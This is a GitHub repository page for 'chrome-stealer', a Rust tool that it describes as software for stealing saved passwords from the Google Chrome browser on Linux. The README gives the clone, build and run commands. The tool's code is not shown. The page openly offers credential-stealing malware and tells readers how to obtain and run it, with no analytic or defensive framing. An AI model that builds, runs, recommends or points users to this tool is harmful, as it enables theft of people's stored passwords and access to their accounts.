Skip to content

Software for stealing saved passwords from Google Chrome browser implemented in Rust

License

Notifications You must be signed in to change notification settings

astronmax/chrome-stealer

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

10 Commits
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

About

Software for stealing saved passwords from Google Chrome browser implemented in Rust. Currently only Linux OS is supported.

Install

You can build it from sources using cargo tool:

git clone --depth 1 https://github.com/astronmax/chrome-stealer && cd chrome-stealer
cargo build -r
cd target/release
./chrome-stealer

After that you'll get chrome-stealer executable which depends only on core libraries of your OS.

About

Software for stealing saved passwords from Google Chrome browser implemented in Rust

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages